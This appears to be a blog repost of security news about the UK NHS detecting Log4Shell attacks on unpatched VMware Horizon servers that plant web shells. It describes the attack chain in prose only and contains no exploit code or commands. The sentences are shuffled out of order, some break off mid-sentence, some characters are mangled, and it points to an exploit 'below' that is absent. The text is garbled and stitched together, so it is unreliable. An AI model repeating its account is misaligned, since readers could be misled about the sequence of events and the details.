![]() This advice can be found in the NHS technical report, and we will not be reproducing it here to avoid situations where the NHS updates the code with better detections. ![]() ![]() To help organizations that run VMWare Horizon servers, the UK NHS has released instructions on how to detect possible signs of exploitation. According to the CISA, cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit Log4Shell in unpatched, internet-facing VMware Horizon and. If the server has not been patched, the attacker's exploit will force the Horizon server to connect via LDAP to a malicious domain, download and then run a PowerShell script that installs a web shell, which will act as a backdoor for future attacks. The NHS' security team said the attacks follow the pattern of the initial Log4Shell exploit (detailed above), with the attacker sending a JDNI request to a VMWare Horizon server. NHS discovers Log4Shell attacks on VMWare Horizon serversÄ«ut the NHS said that despite the patch's availability, it is now seeing attacks that are trying to identify VMWare Horizon servers that haven't been patched. VMWare Horizon, a platform for managing and deploying virtual desktops for a company's staff, was one of the many VMWare affected products that received a patch to prevent Log4Shell attacks. Log4j patches were released to fix and counter the attacks, and VMWare was one of the companies that integrated the Log4j fixes in its products to prevent the easy exploitation of its software via Log4Shell exploits. The vulnerability was initially discovered by operators of Minecraft servers, which relied on Log4j for logging, who discovered in late November that someone was using an exploit in the form below to hijack their servers. What is Log4ShellÄisclosed on December 9, Log4Shell is a vulnerability in Apache Log4j, a Java library used to add log management capabilities to Java web and desktop apps. Flaws in Microsoft and VMware products allowed the attackers to access emails and other documents, and to perform federated authentication across victim. The NHS-reported attacks mark the second time a VMWare product has been targeted via the Log4Shell vulnerability after reports that the Conti ransomware gang abused Log4Shell to compromise VMWare vCenter servers last month. After obtaining initial access and installing XMRig on the VMWare Horizon server, the actors used RDP and the built-in Windows user account DefaultAccount to move laterally to a VMware VDI-KMS host. "The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware," the NHS team said in a security alert published on Wednesday. The security team of the UK National Health Service (NHS) said that it detected an unknown threat actor using the Log4Shell vulnerability to hack VMWare Horizon servers and plant web shells for future attacks. UK NHS: Threat actor targets VMware Horizon servers using Log4Shell exploits
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |